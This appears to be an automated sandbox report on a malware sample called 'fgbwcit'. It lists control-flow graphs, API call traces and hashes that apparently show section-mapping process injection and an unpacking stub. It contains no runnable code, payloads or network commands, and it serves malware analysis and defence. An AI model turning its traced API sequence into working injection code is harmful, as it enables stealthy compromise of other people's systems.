NtMapViewOfSection 3608->3609 3608->3610 3609->3610 3549 402fbe 3550 402fc3 3549->3550 3552 40304f 3550->3552 3553 4019e0 3550->3553 3554 4019e7 3553->3554 3555 401a29 Sleep 3554->3555 3560 4014fb 3555->3560 3557 401a44 3559 401a55 3557->3559 3572 4015fb 3557->3572 3559->3552 3561 40150c 3560->3561 3562 4016ab NtDuplicateObject 3561->3562 3571 4015ea 3561->3571 3563 4016cc NtCreateSection 3562->3563 3562->3571 3564 4016f2 NtMapViewOfSection 3563->3564 3565 40174c NtCreateSection 3563->3565 3564->3565 3566 401715 NtMapViewOfSection 3564->3566 3567 401778 3565->3567 3565->3571 3566->3565 3570 401733 3566->3570 3568 401782 NtMapViewOfSection 3567->3568 3567->3571 3569 4017a9 NtMapViewOfSection 3568->3569 3568->3571 3569->3571 3570->3565 3571->3557 3573 40160b 3572->3573 3574 4016ab NtDuplicateObject 3573->3574 3578 4017cb 3573->3578 3575 4016cc NtCreateSection 3574->3575 3574->3578 3576 4016f2 NtMapViewOfSection 3575->3576 3577 40174c NtCreateSection 3575->3577 3576->3577 3579 401715 NtMapViewOfSection 3576->3579 3577->3578 3580 401778 3577->3580 3578->3559 3579->3577 3581 401733 3579->3581 3580->3578 3582 401782 NtMapViewOfSection 3580->3582 3581->3577 3582->3578 3583 4017a9 NtMapViewOfSection 3582->3583 3583->3578

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 415840-415868 2 415870-415877 0->2 3 415879-41587b 2->3 4 41587f-415885 2->4 3->4 5 415887-415891 4->5 6 415896-4158a0 4->6 5->6 7 4158a2-4158ae 6->7 8 4158b8-4158bf 6->8 7->8 8->2 9 4158c1-4158c9 8->9 10 4158d0-4158d6 9->10 12 4158e4-4158eb 10->12 13 4158d8-4158de 10->13 14 4158f1-4158f8 12->14 15 4158ed 12->15 13->12 14->10 16 4158fa-415901 14->16 15->14 17 415a30-415a3e 16->17 18 415907-415a18 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415a40-415a4e SetCommState 17->19 22 415a21-415a2d 18->22 23 415a1a-415a1b PulseEvent 18->23 24 415a50-415a57 19->24 25 415a59-415a60 19->25 22->17 23->22 24->19 24->25 26 415b26-415b35 call 415490 25->26 27 415a66-415b20 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415b37-415b48 26->33 34 415b6d-415b78 LoadLibraryA call 4154c0 26->34 27->26 35 415b50-415b60 33->35 40 415b7d-415b8e call 4157b0 34->40 38 415b62 35->38 39 415b68-415b6b 35->39 38->39 39->34 39->35 45 415b90-415b97 40->45 46 415ba3-415ba9 45->46 47 415b99-415b9f 45->47 49 415bb0-415bb7 46->49 50 415bab call 4154b0 46->50 47->46 53 415bc6-415bcd 49->53 54 415bb9-415bc0 InterlockedDecrement 49->54 50->49 53->45 56 415bcf-415bdf 53->56 54->53 57 415be0-415bf0 56->57 58 415bf2 57->58 59 415bf9-415bfc 57->59 58->59 59->57 60 415bfe-415c09 59->60 61 415c10-415c15 60->61 62 415c17-415c1d 61->62 63 415c1f-415c25 61->63 62->63 64 415c27-415c34 62->64 63->61 63->64
                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415912
                                                            • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041592B
                                                            • FindAtomW.KERNEL32(00000000), ref: 00415932
                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041593A
                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415952
                                                            • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415979
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00415981
                                                            • GetVersionExW.KERNEL32(?), ref: 0041598E
                                                            • DisconnectNamedPipe.KERNEL32(?), ref: 004159A1
                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004159E6
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004159F5
                                                            • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415A0B
                                                            • PulseEvent.KERNEL32(00000000), ref: 00415A1B
                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415A44
                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415A75
                                                            • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415A86
                                                            • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415A8E
                                                            • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415ACE
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415AD5
                                                            • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415ADB
                                                            • GetBinaryType.KERNEL32(0041742C,?), ref: 00415AED
                                                            • LoadLibraryA.KERNELBASE(00417438), ref: 00415B72
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                            • String ID: k`$}$
                                                            • API String ID: 2545807588-956986773
                                                            • Opcode ID: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
                                                            • Instruction ID: 1a4de0b24bdd0306310a4676e1e64ec04895e512500ce6235e9595c5278ae4d7
                                                            • Opcode Fuzzy Hash: 0f004dcb0baacb74f7bd845f89d4f92a998844297ece2a5bfd7f19758ff6c51e
                                                            • Instruction Fuzzy Hash: 3AA1F271802924EBC720EB65EC44ADF7B79FF89341F41406AF50AA7150DB385A81CFAD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 174 4015c6 170->174 175 40162f-401632 170->175 172 4015f6-4015f8 171->172 173 40157d-40159a 171->173 185 40159d 173->185 186 40152f-401530 173->186 174->168 179 4015c8-4015cd 174->179 176 401634-401646 call 40127e 175->176 177 4016a5-4016a6 175->177 180 401648-401659 176->180 183 4016a7-4016a9 177->183 184 40162d 177->184 179->180 181 4015cf-4015d0 179->181 193 40165b 180->193 194 40165e-401663 180->194 187 4015d2-4015e8 181->187 188 4015b6-4015b9 181->188 190 401987 183->190 191 4016ab-4016c6 NtDuplicateObject 183->191 184->175 185->165 192 40159f-4015a1 185->192 186->158 195 4015ea-4015f5 187->195 196 40157c 187->196 188->176 201 4015bb-4015c3 188->201 202 401996-4019dd call 40127e 190->202 191->190 198 4016cc-4016f0 NtCreateSection 191->198 199 4015a3 192->199 200 40161c 192->200 193->194 212 401989-401991 194->212 213 401669-40167a 194->213 195->172 196->173 203 4015a9-4015b4 196->203 204 4016f2-401713 NtMapViewOfSection 198->204 205 40174c-401772 NtCreateSection 198->205 206 4015a5-4015a6 199->206 207 40161e-401643 199->207 200->207 201->170 203->188 204->205 211 401715-401731 NtMapViewOfSection 204->211 205->190 214 401778-40177c 205->214 206->203 207->176 211->205 217 401733-401749 211->217 212->194 212->202 213->190 227 401680-4016a3 213->227 214->190 218 401782-4017a3 NtMapViewOfSection 214->218 217->205 218->190 223 4017a9-4017c5 NtMapViewOfSection 218->223 223->190 224 4017cb 223->224 224->190 228 4017cb call 4017d0 224->228 227->177 228->190
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                            • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 236 4015fb-401629 241 401620-401625 236->241 242 40162c-401643 236->242 241->242 244 401634-401659 call 40127e 242->244 249 40165b 244->249 250 40165e-401663 244->250 249->250 252 401989-401991 250->252 253 401669-40167a 250->253 252->250 256 401996-4019dd call 40127e 252->256 257 401680-4016a3 253->257 258 401987 253->258 264 4016a5-4016a6 257->264 258->256 266 4016a7-4016a9 264->266 267 40162d-401632 264->267 266->258 270 4016ab-4016c6 NtDuplicateObject 266->270 267->244 267->264 270->258 272 4016cc-4016f0 NtCreateSection 270->272 274 4016f2-401713 NtMapViewOfSection 272->274 275 40174c-401772 NtCreateSection 272->275 274->275 277 401715-401731 NtMapViewOfSection 274->277 275->258 278 401778-40177c 275->278 277->275 280 401733-401749 277->280 278->258 281 401782-4017a3 NtMapViewOfSection 278->281 280->275 281->258 283 4017a9-4017c5 NtMapViewOfSection 281->283 283->258 284 4017cb 283->284 284->258 286 4017cb call 4017d0 284->286 286->258
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 287 401613-401643 292 401634-401659 call 40127e 287->292 297 40165b 292->297 298 40165e-401663 292->298 297->298 300 401989-401991 298->300 301 401669-40167a 298->301 300->298 304 401996-4019dd call 40127e 300->304 305 401680-4016a3 301->305 306 401987 301->306 312 4016a5-4016a6 305->312 306->304 314 4016a7-4016a9 312->314 315 40162d-401632 312->315 314->306 318 4016ab-4016c6 NtDuplicateObject 314->318 315->292 315->312 318->306 320 4016cc-4016f0 NtCreateSection 318->320 322 4016f2-401713 NtMapViewOfSection 320->322 323 40174c-401772 NtCreateSection 320->323 322->323 325 401715-401731 NtMapViewOfSection 322->325 323->306 326 401778-40177c 323->326 325->323 328 401733-401749 325->328 326->306 329 401782-4017a3 NtMapViewOfSection 326->329 328->323 329->306 331 4017a9-4017c5 NtMapViewOfSection 329->331 331->306 332 4017cb 331->332 332->306 334 4017cb call 4017d0 332->334 334->306
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 335 401606-401607 335->335 336 401609 335->336 337 40160b-401629 336->337 338 40163c-401659 call 40127e 336->338 344 401620-401625 337->344 345 40162c-401643 337->345 347 40165b 338->347 348 40165e-401663 338->348 344->345 349 401634-401639 345->349 347->348 351 401989-401991 348->351 352 401669-40167a 348->352 349->338 351->348 355 401996-4019dd call 40127e 351->355 356 401680-4016a3 352->356 357 401987 352->357 363 4016a5-4016a6 356->363 357->355 365 4016a7-4016a9 363->365 366 40162d-401632 363->366 365->357 369 4016ab-4016c6 NtDuplicateObject 365->369 366->349 366->363 369->357 371 4016cc-4016f0 NtCreateSection 369->371 373 4016f2-401713 NtMapViewOfSection 371->373 374 40174c-401772 NtCreateSection 371->374 373->374 376 401715-401731 NtMapViewOfSection 373->376 374->357 377 401778-40177c 374->377 376->374 379 401733-401749 376->379 377->357 380 401782-4017a3 NtMapViewOfSection 377->380 379->374 380->357 382 4017a9-4017c5 NtMapViewOfSection 380->382 382->357 383 4017cb 382->383 383->357 385 4017cb call 4017d0 383->385 385->357
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 386 401627-401629 388 401620-401625 386->388 389 40162c-401643 386->389 388->389 391 401634-401659 call 40127e 389->391 396 40165b 391->396 397 40165e-401663 391->397 396->397 399 401989-401991 397->399 400 401669-40167a 397->400 399->397 403 401996-4019dd call 40127e 399->403 404 401680-4016a3 400->404 405 401987 400->405 411 4016a5-4016a6 404->411 405->403 413 4016a7-4016a9 411->413 414 40162d-401632 411->414 413->405 417 4016ab-4016c6 NtDuplicateObject 413->417 414->391 414->411 417->405 419 4016cc-4016f0 NtCreateSection 417->419 421 4016f2-401713 NtMapViewOfSection 419->421 422 40174c-401772 NtCreateSection 419->422 421->422 424 401715-401731 NtMapViewOfSection 421->424 422->405 425 401778-40177c 422->425 424->422 427 401733-401749 424->427 425->405 428 401782-4017a3 NtMapViewOfSection 425->428 427->422 428->405 430 4017a9-4017c5 NtMapViewOfSection 428->430 430->405 431 4017cb 430->431 431->405 433 4017cb call 4017d0 431->433 433->405
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                            • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 401641-401643 436 401634-401659 call 40127e 434->436 441 40165b 436->441 442 40165e-401663 436->442 441->442 444 401989-401991 442->444 445 401669-40167a 442->445 444->442 448 401996-4019dd call 40127e 444->448 449 401680-4016a3 445->449 450 401987 445->450 456 4016a5-4016a6 449->456 450->448 458 4016a7-4016a9 456->458 459 40162d-401632 456->459 458->450 462 4016ab-4016c6 NtDuplicateObject 458->462 459->436 459->456 462->450 464 4016cc-4016f0 NtCreateSection 462->464 466 4016f2-401713 NtMapViewOfSection 464->466 467 40174c-401772 NtCreateSection 464->467 466->467 469 401715-401731 NtMapViewOfSection 466->469 467->450 470 401778-40177c 467->470 469->467 472 401733-401749 469->472 470->450 473 401782-4017a3 NtMapViewOfSection 470->473 472->467 473->450 475 4017a9-4017c5 NtMapViewOfSection 473->475 475->450 476 4017cb 475->476 476->450 478 4017cb call 4017d0 476->478 478->450
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 480 403103-403127 481 403246-40324b 480->481 482 40312d-403145 480->482 482->481 483 40314b-40315c 482->483 484 40315e-403167 483->484 485 40316c-40317a 484->485 485->485 486 40317c-403183 485->486 487 4031a5-4031ac 486->487 488 403185-4031a4 486->488 489 4031ce-4031d1 487->489 490 4031ae-4031cd 487->490 488->487 491 4031d3-4031d6 489->491 492 4031da 489->492 490->489 491->492 493 4031d8 491->493 492->484 494 4031dc-4031e1 492->494 493->494 494->481 495 4031e3-4031e6 494->495 495->481 496 4031e8-403243 RtlCreateUserThread NtTerminateProcess 495->496 496->481
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 498 403257-40325f 499 4031f0-403243 RtlCreateUserThread NtTerminateProcess 498->499 500 403261-40327f 498->500 501 403246-40324b 499->501 506 403281 500->506 507 403286-403290 500->507 506->507 508 403283-403285 506->508 509 403292 507->509 510 403298-4032ba call 4012ec 507->510 508->507 509->510 511 403293-403297 509->511 516 4032be 510->516 516->516
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 2e8003c-2e80047 67 2e80049 66->67 68 2e8004c-2e80263 call 2e80a3f call 2e80e0f call 2e80d90 VirtualAlloc 66->68 67->68 83 2e8028b-2e80292 68->83 84 2e80265-2e80289 call 2e80a69 68->84 86 2e802a1-2e802b0 83->86 88 2e802ce-2e803c2 VirtualProtect call 2e80cce call 2e80ce7 84->88 86->88 89 2e802b2-2e802cc 86->89 95 2e803d1-2e803e0 88->95 89->86 96 2e80439-2e804b8 VirtualFree 95->96 97 2e803e2-2e80437 call 2e80ce7 95->97 98 2e804be-2e804cd 96->98 99 2e805f4-2e805fe 96->99 97->95 102 2e804d3-2e804dd 98->102 103 2e8077f-2e80789 99->103 104 2e80604-2e8060d 99->104 102->99 106 2e804e3-2e80505 102->106 107 2e8078b-2e807a3 103->107 108 2e807a6-2e807b0 103->108 104->103 109 2e80613-2e80637 104->109 117 2e80517-2e80520 106->117 118 2e80507-2e80515 106->118 107->108 110 2e8086e-2e808be LoadLibraryA 108->110 111 2e807b6-2e807cb 108->111 112 2e8063e-2e80648 109->112 116 2e808c7-2e808f9 110->116 114 2e807d2-2e807d5 111->114 112->103 115 2e8064e-2e8065a 112->115 119 2e80824-2e80833 114->119 120 2e807d7-2e807e0 114->120 115->103 121 2e80660-2e8066a 115->121 122 2e808fb-2e80901 116->122 123 2e80902-2e8091d 116->123 124 2e80526-2e80547 117->124 118->124 128 2e80839-2e8083c 119->128 125 2e807e2 120->125 126 2e807e4-2e80822 120->126 127 2e8067a-2e80689 121->127 122->123 129 2e8054d-2e80550 124->129 125->119 126->114 130 2e8068f-2e806b2 127->130 131 2e80750-2e8077a 127->131 128->110 132 2e8083e-2e80847 128->132 134 2e805e0-2e805ef 129->134 135 2e80556-2e8056b 129->135 136 2e806ef-2e806fc 130->136 137 2e806b4-2e806ed 130->137 131->112 138 2e80849 132->138 139 2e8084b-2e8086c 132->139 134->102 142 2e8056d 135->142 143 2e8056f-2e8057a 135->143 140 2e8074b 136->140 141 2e806fe-2e80748 136->141 137->136 138->110 139->128 140->127 141->140 142->134 146 2e8059b-2e805bb 143->146 147 2e8057c-2e80599 143->147 150 2e805bd-2e805db 146->150 147->150 150->129
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E8024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e80000_fgbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: cdd8919f617255c7124f88763a9ee65c13e7e4487e499b19a24daaab5778fd6d
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 6D526975A01229DFDB64DF58C984BACBBB1BF09304F1480D9E94DAB351DB30AA89CF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 479 4154c0-415600 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041559F
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004155DC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004155FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
